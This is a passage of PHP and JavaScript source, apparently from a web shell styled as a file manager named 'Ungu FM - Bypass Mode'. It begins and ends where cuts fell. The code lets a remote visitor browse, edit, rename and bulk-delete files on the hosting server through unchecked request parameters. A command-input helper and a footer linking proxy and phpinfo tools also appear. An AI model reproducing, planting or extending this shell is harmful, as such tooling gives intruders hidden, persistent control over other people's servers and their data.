urlencode(encodePath(PATH)) . "'; }, 1000);</script>"; } else { echo "<div class='alert alert-danger-custom' style='margin-bottom:20px;'><i class='fa fa-exclamation-triangle'></i> Error saving file.</div>"; } } echo '<div class="bypass-panel" style="margin-bottom:20px;"> <h5><i class="fa fa-file-pen"></i> Edit File: ' . htmlspecialchars($_GET['e']) . '</h5> <form method="post"> <textarea name="data" class="form-control" rows="15">' . htmlspecialchars(file_get_contents(PATH . "/" . $_GET['e'])) . '</textarea><br> <button type="submit" class="btn btn-dark" name="edit"><i class="fa fa-save"></i> Save Changes</button> <a href="?p=' . urlencode(encodePath(PATH)) . '" class="btn btn-secondary" style="background:rgba(158,158,158,0.25);border:1px solid rgba(158,158,158,0.15);border-radius:25px;color:#fff;"><i class="fa fa-times"></i> Cancel</a> </form> </div>'; } // File Listing $folders = []; $files = []; if (is_readable(PATH)) { $fetch_obj = scandir(PATH); foreach ($fetch_obj as $obj) { if ($obj == '.' \|\| $obj == '..') continue; if (is_dir(PATH . '/' . $obj)) { $folders[] = $obj; } elseif (is_file(PATH . '/' . $obj)) { $files[] = $obj; } } } echo '<form id="multiDeleteForm" method="post"><input type="hidden" name="multi_delete" value="1"> <div id="multiDeleteBar" class="multi-delete-bar"> <div><i class="fa fa-check-square" style="color:#ff8a80;"></i> <span id="selectedCount" class="count-badge">0</span> <span style="color:#ff8a80;font-weight:500;margin-left:8px;">item(s) selected</span></div> <div class="d-flex gap-2"> <button type="button" class="btn btn-sm btn-dark" onclick="uncheckAll()" style="background:rgba(255,255,255,0.1)!important;font-size:0.8rem;"><i class="fa fa-times"></i> Uncheck All</button> <button type="submit" class="btn btn-sm btn-danger-custom" onclick="return confirmMultiDelete()" style="font-size:0.8rem;"><i class="fa fa-trash"></i> Delete Selected</button> </div> </div> <table class="table table-hover"> <thead><tr><th style="width:40px;"><input type="checkbox" class="item-checkbox" id="selectAll" onchange="toggleSelectAll()"></th><th>Name</th><th>Size</th><th>Modified</th><th>Perms</th><th>Actions</th></tr></thead> <tbody>'; foreach ($folders as $folder) { echo "<tr> <td><input type='checkbox' class='item-checkbox item-select' name='selected_items[]' value='" . htmlspecialchars($folder) . "' onchange='updateMultiBar()'></td> <td><i class='fa-solid fa-folder' style='color:#ab47bc;'></i> <a href='?p=" . urlencode(encodePath(PATH . "/" . $folder)) . "'>" . $folder . "</a></td> <td><b>---</b></td> <td>" . date("F d Y H:i:s.", filemtime(PATH . "/" . $folder)) . "</td> <td>0" . substr(decoct(fileperms(PATH . "/" . $folder)), -3) . "</td> <td><a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $folder . "'><i class='fa fa-pen'></i></a> <a title='Delete' href='?q=" . urlencode(encodePath(PATH)) . "&d=" . $folder . "' onclick=\"return confirm('Delete folder: $folder?')\"><i class='fa fa-trash'></i></a></td> </tr>"; } foreach ($files as $file) { echo "<tr> <td><input type='checkbox' class='item-checkbox item-select' name='selected_items[]' value='" . htmlspecialchars($file) . "' onchange='updateMultiBar()'></td> <td>" . fileIcon($file) . "<a href='?q=" . urlencode(encodePath(PATH)) . "&e=" . $file . "'>" . $file . "</a></td> <td>" . formatSizeUnits(filesize(PATH . "/" . $file)) . "</td> <td>" . date("F d Y H:i:s.", filemtime(PATH . "/" . $file)) . "</td> <td>0" . substr(decoct(fileperms(PATH . "/" . $file)), -3) . "</td> <td><a title='Edit' href='?q=" . urlencode(encodePath(PATH)) . "&e=" . $file . "'><i class='fa fa-edit'></i></a> <a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $file . "'><i class='fa fa-pen'></i></a> <a title='Delete' href='?q=" . urlencode(encodePath(PATH)) . "&d=" . $file . "' onclick=\"return confirm('Delete file: $file?')\"><i class='fa fa-trash'></i></a></td> </tr>"; } echo "</tbody>\n</table>"; echo '</form>'; // Rename Form if (isset($_GET['r']) && !empty($_GET['r']) && isset($_GET['q'])) { echo '<div class="bypass-panel"> <h5><i class="fa fa-pen-to-square"></i> Rename: ' . htmlspecialchars($_GET['r']) . '</h5> <form method="post"><div class="row g-2"><div class="col-md-8"><input type="text" class="form-control" name="name" value="' . htmlspecialchars($_GET['r']) . '"></div><div class="col-md-4"><button type="submit" class="btn btn-dark w-100" name="rename">Rename</button></div></div></form> </div>'; if (isset($_POST['rename'])) { if (rename(PATH . "/" . $_GET['r'], PATH . "/" . $_POST['name'])) { echo "<script>alert('Renamed successfully.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; } } } echo '</div>'; ?> <script> function bypassCmd(cmd) { document.getElementById('cmdInput').value = cmd; } function updateMultiBar() { const checkboxes = document.querySelectorAll('.item-select:checked'); const bar = document.getElementById('multiDeleteBar'); const count = document.getElementById('selectedCount'); count.textContent = checkboxes.length; if (checkboxes.length > 0) { bar.classList.add('show'); } else { bar.classList.remove('show'); } } function toggleSelectAll() { const selectAll = document.getElementById('selectAll'); document.querySelectorAll('.item-select').forEach(cb => cb.checked = selectAll.checked); updateMultiBar(); } function uncheckAll() { document.querySelectorAll('.item-select, #selectAll').forEach(cb => cb.checked = false); updateMultiBar(); } function confirmMultiDelete() { const checkboxes = document.querySelectorAll('.item-select:checked'); if (checkboxes.length === 0) { alert('No items selected.'); return false; } const names = Array.from(checkboxes).map(cb => cb.value).join(', '); return confirm('Delete these ' + checkboxes.length + ' items?\n' + names); } document.addEventListener('DOMContentLoaded', function() { console.log('%c[Ungu FM - Bypass Mode]', 'color:#7b1fa2;font-weight:bold;font-size:14px'); updateMultiBar(); }); document.addEventListener('keydown', function(e) { if (e.key === 'Enter' && e.target.id === 'cmdInput') { e.preventDefault(); e.target.closest('form').submit(); } }); </script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js"></script> </body> </html>

| ver. 1.4 | Github | . | PHP 8.0.30 | Generation time: 0.14 | proxy | phpinfo | Settings